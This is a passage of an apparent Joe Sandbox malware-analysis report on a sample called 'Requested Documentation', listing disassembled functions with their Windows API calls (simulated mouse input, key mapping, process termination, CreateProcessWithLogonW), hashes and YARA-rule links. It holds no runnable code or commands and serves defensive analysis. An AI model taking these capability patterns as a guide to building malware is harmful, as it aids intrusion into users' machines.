                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0098179A
                                                                              • GetWindowRect.USER32(?,?), ref: 009817FE
                                                                              • ScreenToClient.USER32(?,?), ref: 0098181B
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0098182C
                                                                              • EndPaint.USER32(?,?), ref: 00981876
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                              • String ID:
                                                                              • API String ID: 1827037458-0
                                                                              • Opcode ID: ea4edb6b6b1e489f41c058e6e3aa5a49674d1d72bb107fd4c753e7b7e586e1d7
                                                                              • Instruction ID: 1073870bf73402558b581ac3cc748fa98f2d1e8808badc99ed9f62faf62e093e
                                                                              • Opcode Fuzzy Hash: ea4edb6b6b1e489f41c058e6e3aa5a49674d1d72bb107fd4c753e7b7e586e1d7
                                                                              • Instruction Fuzzy Hash: D241A1345047049FD710EF64CC85FBA7BECEB86724F040629F9A4872A2C7719847DB61
                                                                              Function 00A0B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00A457B0,00000000,01356108,?,?,00A457B0,?,00A0B5A8,?,?), ref: 00A0B712
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00A0B736
                                                                              • ShowWindow.USER32(00A457B0,00000000,01356108,?,?,00A457B0,?,00A0B5A8,?,?), ref: 00A0B796
                                                                              • ShowWindow.USER32(00000000,00000004,?,00A0B5A8,?,?), ref: 00A0B7A8
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00A0B7CC
                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A0B7EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 642888154-0
                                                                              • Opcode ID: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
                                                                              • Instruction ID: dd71b246ea0981a8694402f73f20a1dd220591b435e8fb738776a4abd3b86fad
                                                                              • Opcode Fuzzy Hash: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
                                                                              • Instruction Fuzzy Hash: A3417134602248AFDB22CF28D699B947BF1FF45710F1841B9E9489F6E3C731A856CB61
                                                                              Function 009F709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,009F4E41,?,?,00000000,00000001), ref: 009F70AC
                                                                                • Part of subcall function 009F39A0: GetWindowRect.USER32(?,?), ref: 009F39B3
                                                                              • GetDesktopWindow.USER32 ref: 009F70D6
                                                                              • GetWindowRect.USER32(00000000), ref: 009F70DD
                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009F710F
                                                                                • Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              • GetCursorPos.USER32(?), ref: 009F713B
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009F7199
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: 22cf9bb2e12056613a8b817c8dd5ca64309a07e1654f05f2cff3cf66f71698ea
                                                                              • Instruction ID: 9b2253cb2db1cb17284baac87576e17f9d864cb38a682caa5db9395e21468bb2
                                                                              • Opcode Fuzzy Hash: 22cf9bb2e12056613a8b817c8dd5ca64309a07e1654f05f2cff3cf66f71698ea
                                                                              • Instruction Fuzzy Hash: D431D472509309AFD720DF54CC49B5BB7AAFF88314F000919F585A7191CA74EA0ACB92
                                                                              Function 009D8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009D80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D80C0
                                                                                • Part of subcall function 009D80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D80CA
                                                                                • Part of subcall function 009D80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D80D9
                                                                                • Part of subcall function 009D80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D80E0
                                                                                • Part of subcall function 009D80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D80F6
                                                                              • GetLengthSid.ADVAPI32(?,00000000,009D842F), ref: 009D88CA
                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009D88D6
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 009D88DD
                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 009D88F6
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,009D842F), ref: 009D890A
                                                                              • HeapFree.KERNEL32(00000000), ref: 009D8911
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                              • String ID:
                                                                              • API String ID: 3008561057-0
                                                                              • Opcode ID: dfe2aad8a4d23b92f025982115bdca24bec6621bedaa52afd8b7724c4ad8a389
                                                                              • Instruction ID: d4a5cadf832e809ff0b08ab3a2559c369a18d279810f5ead868d9e8f2976c17e
                                                                              • Opcode Fuzzy Hash: dfe2aad8a4d23b92f025982115bdca24bec6621bedaa52afd8b7724c4ad8a389
                                                                              • Instruction Fuzzy Hash: 9A11AF71551209FFDB20DFA4DD59BBF777CEB44312F10812AE885A7211DB32A902DB60
                                                                              Function 009D85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009D85E2
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 009D85E9
                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009D85F8
                                                                              • CloseHandle.KERNEL32(00000004), ref: 009D8603
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009D8632
                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 009D8646
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
                                                                              • Instruction ID: 6b2f1202219e6dc50a8e2e09578cbdcdb5212e29733a8b2afb798bf9e0b9ffaa
                                                                              • Opcode Fuzzy Hash: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
                                                                              • Instruction Fuzzy Hash: A8114A7254020DAFDF11CFA4ED49BDF7BADEB08714F048065FE04A2161C6729D629B61
                                                                              Function 009DB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 009DB7B5
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 009DB7C6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009DB7CD
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 009DB7D5
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009DB7EC
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 009DB7FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: b0641c501896d5d5d19f3ccf2d2c05625425db7c9a3c824b3062e38bfc0b0bce
                                                                              • Instruction ID: 8a7892d74d750cfcf1878463af74e0f77c4058455f94ca015018972bf1078f23
                                                                              • Opcode Fuzzy Hash: b0641c501896d5d5d19f3ccf2d2c05625425db7c9a3c824b3062e38bfc0b0bce
                                                                              • Instruction Fuzzy Hash: 27017175A40209BFEB109BE69C45B5ABFA8EB48311F008066FA08B7291D6319C02CF90
                                                                              Function 009A0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A0193
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 009A019B
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A01A6
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A01B1
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 009A01B9
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A01C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
                                                                              • Instruction ID: a7273e61a10b47488e283bb1f6cc550f1e132c8221c3aafd248b3b1757c1de98
                                                                              • Opcode Fuzzy Hash: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
                                                                              • Instruction Fuzzy Hash: 97016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                              Function 009E53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009E53F9
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009E540F
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 009E541E
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E542D
                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E5437
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E543E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
                                                                              • Instruction ID: 83591b98c131512533fd2f3951edbc4199f6a24dcdec08321bed8ed9b26d380e
                                                                              • Opcode Fuzzy Hash: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
                                                                              • Instruction Fuzzy Hash: 4BF0123154155CBFD7319B929C0DEAB7A7CEBC6B11F000169FA04E145196A51A0386B5
                                                                              Function 009E7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 009E7243
                                                                              • EnterCriticalSection.KERNEL32(?,?,00990EE4,?,?), ref: 009E7254
                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00990EE4,?,?), ref: 009E7261
                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00990EE4,?,?), ref: 009E726E
                                                                                • Part of subcall function 009E6C35: CloseHandle.KERNEL32(00000000,?,009E727B,?,00990EE4,?,?), ref: 009E6C3F
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7281
                                                                              • LeaveCriticalSection.KERNEL32(?,?,00990EE4,?,?), ref: 009E7288
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
                                                                              • Instruction ID: 68f1be10dbae12cf66729e86e384fae942a555268f22e3e5bdc03bc30ffb9624
                                                                              • Opcode Fuzzy Hash: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
                                                                              • Instruction Fuzzy Hash: 5BF05E76540716EFE722ABA4ED8CADA7729EF59702B100631F603A14A1CB765803CB50
                                                                              Function 009D8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009D899D
                                                                              • UnloadUserProfile.USERENV(?,?), ref: 009D89A9
                                                                              • CloseHandle.KERNEL32(?), ref: 009D89B2
                                                                              • CloseHandle.KERNEL32(?), ref: 009D89BA
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 009D89C3
                                                                              • HeapFree.KERNEL32(00000000), ref: 009D89CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
                                                                              • Instruction ID: f0523ea54fac843d97d24ce1705c4a6e566ef04e40b6161c6682d1d7396013e7
                                                                              • Opcode Fuzzy Hash: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
                                                                              • Instruction Fuzzy Hash: 49E0C236004209FFDA119FE1EC0C90ABB79FB89722B108230F329A5870CB329463DB91
                                                                              Function 009F85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 009F8613
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009F8722
                                                                              • VariantClear.OLEAUT32(?), ref: 009F889A
                                                                                • Part of subcall function 009E7562: VariantInit.OLEAUT32(00000000), ref: 009E75A2
                                                                                • Part of subcall function 009E7562: VariantCopy.OLEAUT32(00000000,?), ref: 009E75AB
                                                                                • Part of subcall function 009E7562: VariantClear.OLEAUT32(00000000), ref: 009E75B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              • Opcode ID: 38a62877c3dc34b691b5115e74cebb8d1f00fb2a740401e53f164e167310cfbc
                                                                              • Instruction ID: d9c74807c94d66463bc3691f3037941553e823f7853722a051f139775165fe0b
                                                                              • Opcode Fuzzy Hash: 38a62877c3dc34b691b5115e74cebb8d1f00fb2a740401e53f164e167310cfbc
                                                                              • Instruction Fuzzy Hash: E5918C706043059FC750EF24C484A6BB7E8EFC9754F14892EF99A8B361DB31E906CB92
                                                                              Function 009E2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
                                                                              • _memset.LIBCMT ref: 009E2B87
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E2BB6
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E2C69
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009E2C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              • Opcode ID: d5cbac8840053c740f2f82f1823f4f62d86ad6e759d2b0f1614cdcf3a7c10fd0
                                                                              • Instruction ID: 9395a3d4f5cfaebbe8ca56f3e72c7213315afc4963897e17a5394e38592f06ed
                                                                              • Opcode Fuzzy Hash: d5cbac8840053c740f2f82f1823f4f62d86ad6e759d2b0f1614cdcf3a7c10fd0
                                                                              • Instruction Fuzzy Hash: DA51CB716083809BD7269F2AC845A6FB7ECAB8A310F240A69F895D6291DB60CC04D792
                                                                              Function 009DD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DD5D4
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009DD60A
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009DD61B
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009DD69D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              • Opcode ID: bb4e88547685520a6d65b775cc45afe66db0af385d3a23d8f9efda7ccab18299
                                                                              • Instruction ID: a8f006cb7301a5490246f5ab961dab59e7d7b9d68c06415cb60b232acf205180
                                                                              • Opcode Fuzzy Hash: bb4e88547685520a6d65b775cc45afe66db0af385d3a23d8f9efda7ccab18299
                                                                              • Instruction Fuzzy Hash: 54418CB1641208EFDB15CF64C884B9ABBA9EF44314F15C1AAAD09AF305D7B1DA44CBE0
                                                                              Function 009E2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E27C0
                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009E27DC
                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 009E2822
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A45890,00000000), ref: 009E286B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
